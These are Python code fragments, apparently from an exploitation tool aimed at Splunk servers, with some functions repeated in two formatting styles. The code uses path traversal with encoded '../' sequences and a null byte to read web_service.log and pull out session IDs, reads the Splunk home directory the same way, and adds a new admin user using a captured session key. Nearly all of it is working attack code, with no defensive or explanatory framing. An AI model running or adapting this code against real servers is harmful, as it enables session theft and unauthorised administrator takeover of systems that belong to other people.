def user_is_admin(self,username,password): if self.splunkd == 1: # attempt to auth via splunkd to get a sessionkey self.username = username self.password = password self.splunkd_auth() url = Requestobj("{0}/services/authentication/httpauth-tokens".format(self.splunkd_url)) url.basic_auth(username,password) context = url.makerequest() if '<title>httpauth-tokens' in context.body: self.got_admin =1 return True else: return False elif self.splunkweb == 1: with misc_lock: self.username = username self.password = password if self.splunkweb_auth(): admin_only = Requestobj("{0}/en-US/manager/launcher/server/settings/settings?action=edit".format(self.splunkweb_url)).makerequest() if admin_only.find_data("Port that Splunk Web uses"): print "[i] User:{0} IS AN ADMIN.".format(username) return True else: print "[i] User:{0} is not an admin".format(username) else: pass else: print "Not Connected" return False
def dump_session_ids(self): "Exploits dir traversal issue to dump session ids" print "[i] Attemping to dump sessions" if self.splunkd == 1 and self.username and self.password: #url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url)) url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url)) url.basic_auth(self.username,self.password) result = url.makerequest() sessions=[] if "session=" in result.body: print "[i] Session ID's extracted from web_service.log" sessions = re.findall("session=(.+?)[<\s]",result.body) for session in set(sessions): print "[SESSION]",session return set(sessions)
def add_admin(self,username,password,sessionKey): # look for 201 if self.splunkd == 1 and self.username and self.password: url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url)) url.basic_auth(self.username,self.password) url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password)) url.add_header("authorization","Splunk {0}".format(sessionKey)) result = url.makerequest() if str(result.code) == "201": return True else: return False else: print "[!] Not connected to splunkd. Check port and creds" return False
def add_admin(self, username, password, sessionKey): # look for 201 if self.splunkd == 1 and self.username and self.password: url = Requestobj( "{0}/servicesNS/-/launcher/authentication/users".format( self.splunkd_url)) url.basic_auth(self.username, self.password) url.rawpostdata( "POST", "roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=" .format(username, password)) url.add_header("authorization", "Splunk {0}".format(sessionKey)) result = url.makerequest() if str(result.code) == "201": return True else: return False else: print "[!] Not connected to splunkd. Check port and creds" return False
def user_is_admin(self, username, password): if self.splunkd == 1: # attempt to auth via splunkd to get a sessionkey self.username = username self.password = password self.splunkd_auth() url = Requestobj( "{0}/services/authentication/httpauth-tokens".format( self.splunkd_url)) url.basic_auth(username, password) context = url.makerequest() if '<title>httpauth-tokens' in context.body: self.got_admin = 1 return True else: return False elif self.splunkweb == 1: with misc_lock: self.username = username self.password = password if self.splunkweb_auth(): admin_only = Requestobj( "{0}/en-US/manager/launcher/server/settings/settings?action=edit" .format(self.splunkweb_url)).makerequest() if admin_only.find_data("Port that Splunk Web uses"): print(("[i] User:{0} IS AN ADMIN.".format(username))) return True else: print( ("[i] User:{0} is not an admin".format(username))) else: pass else: print("Not Connected") return False
def get_splunk_home(self): if not self.username or not self.password: print "[i] Valid username and password required" sys.exit() try: r = Requestobj("{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME".format(self.splunkd_url)) r.basic_auth(self.username,self.password) splunkdir = r.makerequest() if "ERROR" not in splunkdir.body and "Remote login disabled" not in splunkdir.body and self.splunkd: self.splunk_home = splunkdir.body.strip() else: print "[***] Could not get home dir setting default.." if "windows" in self.os_name.lower(): self.splunk_home = "c:\\program files\\splunk" else: self.splunk_home = "/opt/splunk" print "Setting Splunk home dir to:{0}".format(self.splunk_home) return self.splunk_home except Exception as err: print "[i] Error occured while attempting to read splunk home dir",err